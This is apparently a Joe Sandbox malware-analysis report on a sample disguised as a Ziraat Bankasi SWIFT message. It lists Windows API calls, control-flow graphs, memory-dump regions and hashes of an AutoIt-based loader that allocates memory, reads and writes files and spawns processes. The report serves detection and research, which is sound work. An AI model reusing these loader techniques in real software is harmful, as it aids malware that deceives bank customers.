                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC371
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64_fseek_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3728024260-0
                                                                                                                                                        • Opcode ID: 7cb0cd1502d2e9c2337ce809aed339c4a2a5d049fa26fbbd03398386e48762ea
                                                                                                                                                        • Instruction ID: cd893ad3215c7a8b13dd98688de1662eb276c7ccef53c9f06223db6a9ed210a7
                                                                                                                                                        • Opcode Fuzzy Hash: 7cb0cd1502d2e9c2337ce809aed339c4a2a5d049fa26fbbd03398386e48762ea
                                                                                                                                                        • Instruction Fuzzy Hash: 24C1F9B1900219ABDF21DF95DC81FDEBBB9BF49310F1040AAF609E6152DB719A848F61

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 569 83742-83762 571 837c2-837c4 569->571 572 83764-83767 569->572 571->572 573 837c6 571->573 574 837c8 572->574 575 83769-83770 572->575 576 837ab-837b3 DefWindowProcW 573->576 577 837ce-837d1 574->577 578 f1e00-f1e2e call 82ff6 call 9e312 574->578 579 8382c-83834 PostQuitMessage 575->579 580 83776-8377b 575->580 587 837b9-837bf 576->587 581 837d3-837d4 577->581 582 837f6-8381d SetTimer RegisterWindowMessageW 577->582 616 f1e33-f1e3a 578->616 586 837f2-837f4 579->586 584 f1e88-f1e9c call c4ddd 580->584 585 83781-83783 580->585 588 837da-837ed KillTimer call 83847 call 8390f 581->588 589 f1da3-f1da6 581->589 582->586 591 8381f-8382a CreatePopupMenu 582->591 584->586 610 f1ea2 584->610 592 83789-8378e 585->592 593 83836-83845 call 9eb83 585->593 586->587 588->586 595 f1ddc-f1dfb MoveWindow 589->595 596 f1da8-f1daa 589->596 591->586 599 f1e6d-f1e74 592->599 600 83794-83799 592->600 593->586 595->586 603 f1dac-f1daf 596->603 604 f1dcb-f1dd7 SetFocus 596->604 599->576 606 f1e7a-f1e83 call ba5f3 599->606 608 f1e58-f1e68 call c55bd 600->608 609 8379f-837a5 600->609 603->609 612 f1db5-f1dc6 call 82ff6 603->612 604->586 606->576 608->586 609->576 609->616 610->576 612->586 616->576 620 f1e40-f1e53 call 83847 call 84ffc 616->620 620->576
                                                                                                                                                        APIs
                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 000837B3
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 000837DD
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00083800
                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0008380B
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 0008381F
                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 0008382E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                                        • Opcode ID: ba06c82da5ce6558a59f93fd2bbae6dad5da28ce877bdf6d42c119b025e28ca9
                                                                                                                                                        • Instruction ID: a358bc793d63c1a9a6e210b29bc9b5683619ac526b104b48f8edc6574afef61c
                                                                                                                                                        • Opcode Fuzzy Hash: ba06c82da5ce6558a59f93fd2bbae6dad5da28ce877bdf6d42c119b025e28ca9
                                                                                                                                                        • Instruction Fuzzy Hash: C04159F9108259BBDB347F68EC4ABBE3A95F781B01F000125F682925A2DF65DEC09761

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00083E79
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00083E9E
                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00083EB0
                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00083EC2
                                                                                                                                                          • Part of subcall function 00084024: LoadImageW.USER32(00080000,00000063,00000001,00000010,00000010,00000000), ref: 00084048
                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00083F30
                                                                                                                                                          • Part of subcall function 00083F53: GetSysColorBrush.USER32(0000000F), ref: 00083F86
                                                                                                                                                          • Part of subcall function 00083F53: RegisterClassExW.USER32(00000030), ref: 00083FB0
                                                                                                                                                          • Part of subcall function 00083F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
                                                                                                                                                          • Part of subcall function 00083F53: InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
                                                                                                                                                          • Part of subcall function 00083F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
                                                                                                                                                          • Part of subcall function 00083F53: LoadIconW.USER32(000000A9), ref: 00084004
                                                                                                                                                          • Part of subcall function 00083F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                                        • Opcode ID: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
                                                                                                                                                        • Instruction ID: 8bd33e138eef2b06106f64114a18c4392f9ad0d202866044d326846b04b9c75a
                                                                                                                                                        • Opcode Fuzzy Hash: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
                                                                                                                                                        • Instruction Fuzzy Hash: C0212AB8D04314ABCB10DFA9EC49A99BBF5FB49714F00412AE214A76B0D7B546C48F91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 688 e40360-e403b2 call e40260 CreateFileW 691 e403b4-e403b6 688->691 692 e403bb-e403c8 688->692 693 e40514-e40518 691->693 695 e403ca-e403d6 692->695 696 e403db-e403f2 VirtualAlloc 692->696 695->693 697 e403f4-e403f6 696->697 698 e403fb-e40421 CreateFileW 696->698 697->693 699 e40445-e4045f ReadFile 698->699 700 e40423-e40440 698->700 702 e40461-e4047e 699->702 703 e40483-e40487 699->703 700->693 702->693 705 e404a8-e404bf WriteFile 703->705 706 e40489-e404a6 703->706 707 e404c1-e404e8 705->707 708 e404ea-e4050f CloseHandle VirtualFree 705->708 706->693 707->693 708->693
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E403A5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                        • Instruction ID: b0f25f92f13258ee1a116f096946a56d6ca7afbea918b0db73609457cd9523b7
                                                                                                                                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                        • Instruction Fuzzy Hash: FB510675A50208FBEF60DFB4DC49FEE77B9AF48700F108554F71AEA180DA74AA449B60

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000F41DB
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000F421A
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 000F4249
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                                        • Opcode ID: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
                                                                                                                                                        • Instruction ID: c335266ba93614dd841c5721c06e0826944b61c9f49df59005fe05ef858116c8
                                                                                                                                                        • Opcode Fuzzy Hash: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
                                                                                                                                                        • Instruction Fuzzy Hash: 6C113D71A00109BEEB04ABA4DD86EFF7BACEF04354F004469B546D6192EBB0AE419B50

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 796 836b8-83728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 000836E6
                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 0008371B
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00083724
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                        • Opcode ID: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
                                                                                                                                                        • Instruction ID: 0be4dc01f3c4e24418500a23701a23722593d8dd76c571502c84cbfcee188083
                                                                                                                                                        • Opcode Fuzzy Hash: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
                                                                                                                                                        • Instruction Fuzzy Hash: 4AF0DA795802D07AE7315B97BC08E673E7DE7C7F24B00002ABA04A35B0C66508D5DAB1

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 0008522F
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00085283
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293
                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F3CB0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                                        • String ID: Line:
                                                                                                                                                        • API String ID: 1053898822-1585850449
                                                                                                                                                        • Opcode ID: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
                                                                                                                                                        • Instruction ID: 6d8badd5061511bda8d0c03649d0e62b36d40e0fbfcf09b430b76e1b389823ac
                                                                                                                                                        • Opcode Fuzzy Hash: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
                                                                                                                                                        • Instruction Fuzzy Hash: 1D31AF71008744AED735FB60DC46FDEB7D8BF45310F00451AF5C5925A2EB70A688CB96

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 832 e41e10-e41f43 call e3fa40 call e41d00 CreateFileW 839 e41f45 832->839 840 e41f4a-e41f5a 832->840 841 e42017-e4201c 839->841 843 e41f61-e41f7b VirtualAlloc 840->843 844 e41f5c 840->844 845 e41f82-e41f99 ReadFile 843->845 846 e41f7d 843->846 844->841 847 e41f9d-e41fb2 call e40ab0 845->847 848 e41f9b 845->848 846->841 850 e41fb7-e41ff1 call e41d40 call e40d00 847->850 848->841 855 e41ff3-e42008 call e41d90 850->855 856 e4200d-e42015 850->856 855->856 856->841
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00E41D00: Sleep.KERNELBASE(000001F4), ref: 00E41D11
                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E41F39
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFileSleep
                                                                                                                                                        • String ID: CZRTSJVDO0NQ5N3HDH
                                                                                                                                                        • API String ID: 2694422964-1444722434
                                                                                                                                                        • Opcode ID: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
                                                                                                                                                        • Instruction ID: 5b7a32d190eca1d701b7f8bcdfcd02f347dced269c677f491d08c0e31870f8bd
                                                                                                                                                        • Opcode Fuzzy Hash: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
                                                                                                                                                        • Instruction Fuzzy Hash: 2A51B370D04248DBEF11DBE4D815BEEBBB9AF08304F004599E608BB2C1D7791B49DBA5

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00085374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141148,?,000861FF,?,00000000,00000001,00000000), ref: 00085392
                                                                                                                                                          • Part of subcall function 000849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D
                                                                                                                                                        • _wcscat.LIBCMT ref: 000F2D80
                                                                                                                                                        • _wcscat.LIBCMT ref: 000F2DB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                        • String ID: \$\Include\
                                                                                                                                                        • API String ID: 3592542968-2640467822
                                                                                                                                                        • Opcode ID: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
                                                                                                                                                        • Instruction ID: b702fda1c5e621541e784bed729db25c55bcf70b267479477deaffad09b2ae65
                                                                                                                                                        • Opcode Fuzzy Hash: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
                                                                                                                                                        • Instruction Fuzzy Hash: 155184B95043409FC714EF55E9818EAB7F4FF5A700B84492EF68593672EB3095C8CB52
                                                                                                                                                        APIs
                                                                                                                                                        • __getstream.LIBCMT ref: 000A34FE
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 000A3539
                                                                                                                                                        • __wopenfile.LIBCMT ref: 000A3549
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                        • String ID: <G
                                                                                                                                                        • API String ID: 1820251861-2138716496
                                                                                                                                                        • Opcode ID: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
                                                                                                                                                        • Instruction ID: 40cf50764ee27dd4d265f3992693e73927b9c1a2d15094deb7fd3436b3698ba4
                                                                                                                                                        • Opcode Fuzzy Hash: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
                                                                                                                                                        • Instruction Fuzzy Hash: 24110A70E00306DFDB61BFF49C426AE76F4AF4B350B148525F419C7182EB34CA1197A1
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0009D28B,SwapMouseButtons,00000004,?), ref: 0009D2BC
                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2DD
                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                        • Opcode ID: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                                                                                                                                                        • Instruction ID: bbb3eb5ae65b5749cde86fafaa9396aefe88774d7009112125bd1caa09073b23
                                                                                                                                                        • Opcode Fuzzy Hash: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                                                                                                                                                        • Instruction Fuzzy Hash: 43113975655208BFDF208FA8DC84EAF7BF8EF54745F10846AF805D7110E671AE41AB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F
                                                                                                                                                          • Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
                                                                                                                                                          • Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670
                                                                                                                                                        • _free.LIBCMT ref: 000CC4DD
                                                                                                                                                        • _free.LIBCMT ref: 000CC4E4
                                                                                                                                                        • _free.LIBCMT ref: 000CC54F
                                                                                                                                                          • Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
                                                                                                                                                          • Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3
                                                                                                                                                        • _free.LIBCMT ref: 000CC557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                                        • Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                                                        • Instruction ID: 6e4686f9d40fa8af3bfb10f2a5344bd4b07fc6e863fb712b65a37b5deaa2873b
                                                                                                                                                        • Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                                                        • Instruction Fuzzy Hash: 93513EB1904219AFDB249F64DC81BEDBBB9FF48310F1040AEF25DA3242DB715A808F59
                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E40A85
                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 00E40AA4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CreateExit
                                                                                                                                                        • String ID: D
                                                                                                                                                        • API String ID: 126409537-2746444292
                                                                                                                                                        • Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                                                                        • Instruction ID: aebd3f082380315f1fddf1a401db405e5542acb3a478774ddd39e97e05dbce29
